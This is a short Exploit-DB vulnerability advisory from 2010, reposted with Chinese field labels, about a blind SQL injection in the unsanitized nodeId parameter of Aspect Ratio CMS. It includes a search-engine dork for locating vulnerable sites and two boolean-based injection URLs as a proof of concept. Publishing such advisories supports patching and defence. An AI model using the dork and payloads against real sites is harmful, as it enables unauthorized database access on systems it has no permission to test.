Aspect Ratio CMS – Blind SQL Injection

  • 作者: Stephan Sattler
    日期: 2010-10-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15205/
  • # Author: Stephan Sattler // http://www.solidmedia.de
    # Software Website: http://www.meso.net
    # Software Link: http://www.meso.net/aspekt-ratio
    # Dork: inurl:w3.php?nodeId=
     
     
    [ Vulnerability ]
    
    
    # Explanation:
    
    $_GET["nodeId"] isn't sanitized before executing the database query.
    An attacker can use this for a blind SQL injection attack.
    
    
    # Exploiting the Vulnerability // PoC:
    
    URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - will show the page
    URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms